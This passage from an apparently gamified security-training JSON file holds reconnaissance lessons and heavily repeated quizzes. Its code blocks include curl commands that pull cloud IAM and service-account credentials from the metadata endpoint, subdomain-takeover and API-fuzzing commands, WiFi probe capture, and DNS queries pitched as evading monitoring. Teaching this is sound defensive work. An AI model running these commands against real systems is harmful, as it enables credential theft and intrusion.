reveals...","opts":["Server vulnerabilities","Relationships that identify high-value social engineering targets","Open ports","DNS records"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-domain-takeover","cat":"Reconnaissance","title":"Subdomain Takeover Detection","diff":3,"xp":200,"intro":"Find dangling DNS records pointing to unclaimed services.","sections":[{"type":"text","content":"When a CNAME points to a decommissioned cloud service, anyone can claim that subdomain. Check for: S3 NoSuchBucket, Heroku No such app, GitHub Pages 404."},{"type":"code","lang":"bash","content":"subjack -w subdomains.txt -t 100 -ssl\nnuclei -l subdomains.txt -t takeovers/\n# Manual check:\ndig old.target.com CNAME +short\ncurl old.target.com  # look for 'NoSuchBucket', 'No such app'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Subdomain takeover requires...","opts":["SQL injection","A CNAME pointing to an unclaimed cloud resource","Physical access","Admin credentials"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-api-fuzzing","cat":"Reconnaissance","title":"API Endpoint Fuzzing","diff":3,"xp":200,"intro":"Discover undocumented API endpoints through systematic fuzzing.","sections":[{"type":"text","content":"Fuzz API paths with wordlists. Check for swagger.json, openapi.json, and common API patterns like /api/v1/, /api/v2/."},{"type":"code","lang":"bash","content":"ffuf -u https://api.target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt\ncurl https://api.target.com/swagger.json\ncurl https://api.target.com/openapi.json\ncurl https://api.target.com/api-docs"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"API fuzzing discovers...","opts":["User passwords","Hidden endpoints not in documentation","Network topology","Encryption keys"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cloud-metadata-recon","cat":"Reconnaissance","title":"Cloud Metadata Service Recon","diff":3,"xp":200,"intro":"Access cloud instance metadata for credential theft.","sections":[{"type":"text","content":"Every cloud instance has a metadata endpoint at 169.254.169.254. It exposes instance details, IAM roles, and temporary credentials."},{"type":"code","lang":"bash","content":"curl http://169.254.169.254/latest/meta-data/\ncurl http://169.254.169.254/latest/meta-data/iam/security-credentials/\n# GCP\ncurl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Cloud metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-red-team-planning","cat":"Reconnaissance","title":"Red Team Engagement Planning","diff":5,"xp":300,"intro":"Plan a complete red team engagement from start to finish.","sections":[{"type":"text","content":"Red team planning: define objectives (not just 'hack everything'), establish rules of engagement, set communication protocols, plan operational security, and define success criteria."},{"type":"code","lang":"bash","content":"# Engagement plan:\n# 1. Objectives: 'Can an attacker reach PII in the database?'\n# 2. Scope: external IPs, web apps, social engineering\n# 3. Rules: no DoS, business hours only, emergency contact\n# 4. OpSec: separate infrastructure, VPN, fresh domains\n# 5. Timeline: 2 weeks recon, 1 week exploitation, 1 week reporting\n# 6. Deconfliction: how to verify you're the red team if caught"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Red team objectives should be...","opts":["'Hack everything'","Specific business-risk questions ('Can an attacker reach X?')","As broad as possible","Only technical"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-watering-hole-recon","cat":"Reconnaissance","title":"Watering Hole Attack Reconnaissance","diff":4,"xp":250,"intro":"Identify websites frequently visited by target employees.","sections":[{"type":"text","content":"A watering hole attack compromises a website the target visits, then serves exploits to visitors from the target organization. Recon phase identifies these sites."},{"type":"code","lang":"bash","content":"# Identify watering hole candidates:\n# 1. Industry-specific forums and news sites\n# 2. Professional association websites\n# 3. Local restaurant/coffee shop sites near the office\n# 4. Training/certification platforms used by the industry\n# 5. Open-source projects the target contributes to"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Watering hole attacks target...","opts":["The target directly","Websites the target's employees frequently visit","Email servers","DNS servers"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-wifi-probe-capture","cat":"Reconnaissance","title":"WiFi Probe Request Analysis","diff":3,"xp":200,"intro":"Capture probe requests to learn SSIDs devices have connected to.","sections":[{"type":"text","content":"Devices broadcast probe requests for previously connected networks. This reveals: hotel names, home networks, office SSIDs, and travel history."},{"type":"code","lang":"bash","content":"airmon-ng start wlan0\ntshark -i wlan0mon -Y 'wlan.fc.type_subtype == 0x04' -T fields -e wlan.sa -e wlan_mgt.ssid\n# Or with airodump-ng\nairodump-ng wlan0mon  # shows probed ESSIDs"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"WiFi probe requests reveal...","opts":["Passwords","Networks the device has previously connected to","IP addresses","Encryption keys"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-dns-over-https-recon","cat":"Reconnaissance","title":"DNS over HTTPS Enumeration","diff":4,"xp":250,"intro":"Use DoH resolvers for stealthy DNS enumeration.","sections":[{"type":"text","content":"DNS over HTTPS sends queries encrypted, bypassing DNS monitoring. Use it for recon when you don't want your DNS queries logged."},{"type":"code","lang":"bash","content":"# DoH query via curl\ncurl -s 'https://dns.google/resolve?name=target.com&type=A' | jq\ncurl -s 'https://cloudflare-dns.com/dns-query?name=target.com&type=MX' -H 'Accept: application/dns-json' | jq\n# DoH hides your queries from network monitors"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"DNS over HTTPS helps attackers by...","opts":["Making queries faster","Encrypting DNS queries to bypass network monitoring","Changing DNS results","Blocking DNS"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-certificate-transparency-monitor","cat":"Reconnaissance","title":"Certificate Transparency Monitoring","diff":4,"xp":250,"intro":"Monitor CT logs in real-time for new target certificates.","sections":[{"type":"text","content":"When the target provisions a new certificate (new subdomain, new service), it appears in CT logs. Real-time monitoring catches these immediately."},{"type":"code","lang":"bash","content":"# Monitor CT logs in real-time\ncertstream --url wss://certstream.calidog.io | grep target.com\n# Or query crt.sh periodically\ncurl -s 